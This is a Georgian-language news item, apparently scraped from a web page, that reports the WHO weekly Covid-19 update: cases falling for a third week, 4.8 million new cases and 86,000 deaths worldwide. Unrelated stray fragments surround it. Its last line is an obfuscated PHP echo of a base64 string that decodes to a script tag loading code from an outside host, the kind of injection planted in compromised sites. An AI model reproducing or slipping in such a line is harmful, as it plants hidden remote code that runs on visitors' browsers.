celsiusi
ავერსი შნაიდერი
ჯანდაცვის მსოფლიო ორგანიზაციის მონაცემებით Covid-19-ით ინფიცირების შემთხვევები მესამე კვირაა მცირდება, თუმცა, ამასთანავე, დადასტურებული შემთხვევების რაოდენობა ჯერ კიდევ ერთ-ერთ უმაღლეს ნიშნულზეა პანდემიის დაწყებიდან.
 
ამ კვირაში მთელ მსოფლიოში დაფიქსირდა ინფიცირების 4.8 მილიონი ახალი შემთხვევა და 86 ათასი გარდაცვალება - ამის შესახებ საუბარია ჯანმოს ყოველკვირეულ ეპიდემიოლოგიურ ანგარიშში, რომელიც 16 მაისამდე მონაცემებს მოიცავს.
 
წინა კვირასთან შედარებით, ინფიცირების ახალი შემთხვევები შემცირებულია 12%-ით.  ევროპა ინფიცირების შემთხვევების მკვეთრი 26%-იანი შემცირების შესახებ იუწყება.
 
"ყველა რეგიონი ახალი შემთხვევების შემცირების შესახებ იუწყება გარდა წყნარი ოკეანის დასავლეთ ნაწილისა, სადაც ახალი შემთხვევები წინა კვირის შემთხვევების რაოდენობის ანალოგიური იყო," - ნათქვამია ჯანმოს ანგარიშში.
 
ბოლო კვირებში შემთხვევების შემცირება მას შემდეგ მოხდა, რაც აპრილში Covid-19-ის შემთხვევებმა რეკორდულ მაჩვენებელს მიაღწია. ამასთან Covid-19 განაგრძობს სწრაფ გავრცელებას ბევრ ქვეყანაში.
1309
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");